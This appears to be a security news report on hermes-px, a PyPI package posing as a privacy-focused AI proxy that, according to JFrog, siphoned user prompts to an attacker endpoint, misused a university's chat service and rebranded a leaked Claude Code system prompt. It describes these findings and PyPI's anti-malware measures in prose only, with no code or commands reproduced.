PyPI proxy trap siphons AI prompts

A Python package presented as a privacy-first shortcut to AI models has been unmasked as a supply-chain threat that quietly captures user prompts, leans on a private university service without authorisation and repurposes proprietary Claude material to make the deception look convincing. Security researchers said the package, hermes-px, was uploaded to PyPI as a supposed “Secure AI Inference Proxy” offering OpenAI-compatible access over Tor and claiming users did not need their own API keys.

Analysis by JFrog, published on April 5, found the package did far more than proxy requests. It configured traffic to pass through Tor, forged browser-style headers and directed requests to an internal chat-completions endpoint tied to Universite Centrale in Tunisia, while also logging every user message to a Supabase endpoint controlled by the attacker. Researchers said that meant victims seeking anonymity were instead handing over their prompts and exposing their real IP details through direct exfiltration outside the Tor path the package advertised.

The package’s social engineering appears to have been unusually polished for a malicious upload. JFrog said the README included migration guidance, error-handling documentation, code examples and even a retrieval-augmented generation feature, helping it resemble a serious developer tool rather than throwaway malware. The package also promoted itself as a product from “EGen Labs”, a name the researchers said was fabricated, and included instructions urging users to fetch and execute remote code straight from GitHub through Python’s exec() function, a pattern long viewed by defenders as a major warning sign.

What has drawn particular attention is the package’s use of a large altered system prompt derived from Anthropic’s Claude Code materials. JFrog said a compressed file embedded in hermes-px expanded into a 246,000-character prompt that had been bulk-renamed to replace “Claude” and “Anthropic” references with attacker branding such as “AXIOM-1” and “EGen Labs”. The changes were incomplete, leaving behind enough references to indicate the prompt’s origin. That finding lands days after security researchers reported that Anthropic’s Claude Code source had been exposed through a public npm package source map on March 31, setting off widespread mirroring and analysis of the leaked material.

The overlap between those events points to a fast-moving secondary risk for the AI software ecosystem: once high-value prompts or code leak into public circulation, malicious actors can weaponise them almost immediately in packages aimed at developers. In this case, the prompt was not merely copied; it was repackaged to lend credibility to a non-existent service while masking the real upstream system. JFrog said the package also scrubbed provider references from responses, making it harder for users to understand which model or service was actually producing outputs.

PyPI itself has spent the past two years expanding its anti-malware processes as the volume and sophistication of malicious packages have climbed. The Python Package Index has said community reports are central to its response efforts, introduced a dedicated malware-reporting workflow and, at the end of 2024, added a quarantine feature designed to make suspected projects un-installable while investigations are under way. PyPI has also disclosed that it receives more than 500 inbound malware reports each month, underscoring how common this class of abuse has become.

That backdrop matters because hermes-px does not look like a conventional smash-and-grab credential stealer. Its design reflects a broader shift in software supply-chain threats towards highly themed lures tailored to developers’ workflows, particularly around AI tooling, cloud access and automation. Other PyPI cases documented over the past year have involved packages stealing cloud tokens, exfiltrating credentials through Telegram bots or using suspicious external URLs to pull in second-stage payloads. Security researchers and PyPI administrators have repeatedly warned that a package’s public repository, documentation and project branding may not match the code actually shipped in the installable artefact.